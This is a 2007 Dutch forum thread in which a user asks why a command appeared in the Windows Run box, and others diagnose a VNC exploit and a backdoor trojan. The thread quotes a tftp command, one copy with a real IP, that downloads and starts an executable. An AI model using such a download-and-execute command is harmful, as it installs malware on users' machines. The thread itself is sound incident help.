Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Opeens een scherm met tftp IP-adres GET bdrj.exe *

Pagina: 1
Acties:
  • 151 views sinds 30-01-2008
  • Reageer

Verwijderd

Topicstarter
Ik weet niet wat er precies gebeurde, maar ik zat te typen opent het " uitvoeren " venster zich en de volgende opdracht regel verschijnt: %comspec% /c tftp -i *knip* GET dbrj.exe & start dbrj.
Vervolgens wordt cmd geopend en schiet mijn vuurmuur in de stress???

Kan iemand mij vertellen wat hier is gebeurd??????

[ Voor 4% gewijzigd door pasta op 29-01-2007 21:08 ]


  • sjongenelen
  • Registratie: Oktober 2004
  • Laatst online: 27-11 08:24
hmm hij checked je versie van je Windows, opent een tftp sessie naar *knip*, download dan de dbrj.exe en start m.

niet echt mooi!

edit: doe ff virusscan/spywarescan

[ Voor 24% gewijzigd door pasta op 29-01-2007 21:09 ]

you had me at EHLO


Verwijderd

Het feit dat het bij de uitvoer regel zit betekend dat je die code al een keer hebt gebruikt...

  • Gonadan
  • Registratie: Februari 2004
  • Laatst online: 22:54

Gonadan

Admin Beeld & Geluid, Harde Waren
Verwijderd schreef op maandag 29 januari 2007 @ 19:35:
Ik weet niet wat er precies gebeurde, maar ik zat te typen opent het " uitvoeren " venster zich en de volgende opdracht regel verschijnt: %comspec% /c tftp -i 83.226.184.184 GET dbrj.exe & start dbrj.
Vervolgens wordt cmd geopend en schiet mijn vuurmuur in de stress???

Kan iemand mij vertellen wat hier is gebeurd??????
Trojan? Virus?
Waar zat je in te typen?
Want zo te zien wordt er zooi gedownload en uitgevoerd. :)

www.dbrj.com
lol :p

Look for the signal in your life, not the noise.

Canon R6 | 50 f/1.8 STM | 430EX II
Sigma 85 f/1.4 Art | 100-400 Contemporary
Zeiss Distagon 21 f/2.8


  • DeeJayV
  • Registratie: Oktober 2000
  • Niet online
heb je vnc draaien? updaten naar de laatste versie ;)

  • sjongenelen
  • Registratie: Oktober 2004
  • Laatst online: 27-11 08:24
Verwijderd schreef op maandag 29 januari 2007 @ 19:37:
Het feit dat het bij de uitvoer regel zit betekend dat je die code al een keer hebt gebruikt...
ik lees uit de TS post dat het vanzelf gebeurde. terwijl hij met heel iets anders bezig was

you had me at EHLO


  • TheZeroorez
  • Registratie: September 2005
  • Niet online
even die dbrj.exe uploaden naar http://virusscan.jotti.org/

Verder even HijackThis logje posten, en virusscannen?
WTF?

[ Voor 35% gewijzigd door TheZeroorez op 29-01-2007 19:44 ]


Verwijderd

Topicstarter
Ik zat gewoon in MS Word te typen. Het ging allemaal erg snel, maar deze opdracht werd uitgevoerd via "uitvoeren" Leek alsof iemand remote deze opdracht intypte. Dacht dat mijn PC echter aardig dicht zat...

[ Voor 3% gewijzigd door pasta op 29-01-2007 21:09 . Reden: F_J_K was deze vergeten :+ ]


Verwijderd

Topicstarter
Ik zat gewoon in M$ wordt Microsoft Word te typen. Het ging allemaal erg snel, maar deze opdracht werd uitgevoerd via "uitvoeren" Leek alsof iemand remote deze opdracht intypte. Dacht dat mijn PC echter aardig dicht zat...

Heb idd VNC draaien; nie goed meer?

[ Voor 5% gewijzigd door F_J_K op 29-01-2007 21:06 . Reden: Nogal kinderachtige verbastering, nietwaar? ]


  • Swaptor
  • Registratie: Mei 2003
  • Laatst online: 15-10 19:25

Swaptor

Java Apprentice

Wat hierboven al werd geopperd: je bent de sjaak.
Infectie te pakken, dus direct de juiste en adequate maatregelen treffen, hoogstwaarschijnlijk weet je wel welke ik bedoel.

Ontdek mij!
Proud NGS member
Stats-mod & forum-dude


  • DeeJayV
  • Registratie: Oktober 2000
  • Niet online
is een exploit van vnc, al een tijd bekend... uitzetten en updaten die hap!
met oude versie is het mogelijk zonder wachtwoord in te loggen, dmv van een exploit.

toen ik dit zag gebeuren schrok ik zelf ook behoorlijk, draai nu geen vnc meer :X

[ Voor 53% gewijzigd door DeeJayV op 29-01-2007 19:47 ]


Verwijderd

Topicstarter
DeeJayV schreef op maandag 29 januari 2007 @ 19:45:
is een exploit van vnc, al een tijd bekend... uitzetten en updaten die hap!
met oude versie is het mogelijk zonder wachtwoord in te loggen, dmv van een exploit.

toen ik dit zag gebeuren schrok ik zelf ook behoorlijk, draai nu geen vnc meer :X
Das i.d.d. nie zo mooi. Heb vnc geupdate en firewall ingesteld dat hij geen verbindingen van buiten mijn lan mag accepteren. Moet nu wel goed gaan denk ik.

Het bestand (bdrj.exe) is geloof ik niet gedownload. Mijn vuurmuur heeft het geblokt. Weet iemand wat voor progje hier getracht wordt te runnen?

Verwijderd

M$ wordt

Ik snap nu wat er hier bedoeld wordt:

Het niveau op GoT en MSN jeugd wat T.net bestormd

  • Fatamorgana
  • Registratie: Augustus 2001
  • Laatst online: 21-07 01:24

Fatamorgana

Fietsen is gezond.

AntiVir Found: HEUR/Malware
BitDefender Found: Generic.Malware.SWYdld.87D41066
Dr.Web Found: BACKDOOR.Trojan (probable variant)
NOD32 Found: probably unknown NewHeur_PE (probable variant)

  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

Internetaansluiting er uit, formatteren, opnieuw installeren, Windows updaten, nu wel fatsoenlijk beveiligen, goede virusscanner updaten, backup terugzetten, internetaansluiting er weer in.

Als je een backup hebt dan, anders van ellende maar je aangetaste systeem eerst backuppen en later voorzichting weer benaderen.

En doe rustig, het is toch al veel te laat... Pro forma verander ik even de topictitel van 'Help! wat gebeurt er? bdrj.exe???', maar ik geloof dat we al wel klaar zijn.

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)


Verwijderd

Overigens zou ik als ik jou was ook even een mailtje richting abuse@bredband.com sturen over deze gebruiker. Waarschijnlijk is het een of ander scriptkiddy en krijgt ie hiermee op z'n kop van z'n pappie.

Verwijderd

Topicstarter
Haha, in dit geval hoef je de jeugd niet de schuld te geven hoor. Ook oudere jongeren hebben soms last van dwangmatige " T"

Verwijderd

Verwijderd schreef op maandag 29 januari 2007 @ 21:08:
Waarschijnlijk is het een of ander scriptkiddy en krijgt ie hiermee op z'n kop van z'n pappie.
De malware in kwestie is o.a. een email harvester. There's money involved.
Voor zover het nog niet zeker was: De inhoud van de malware zelf bevestigt dat het idd via VNC binnen is gekomen.
Pagina: 1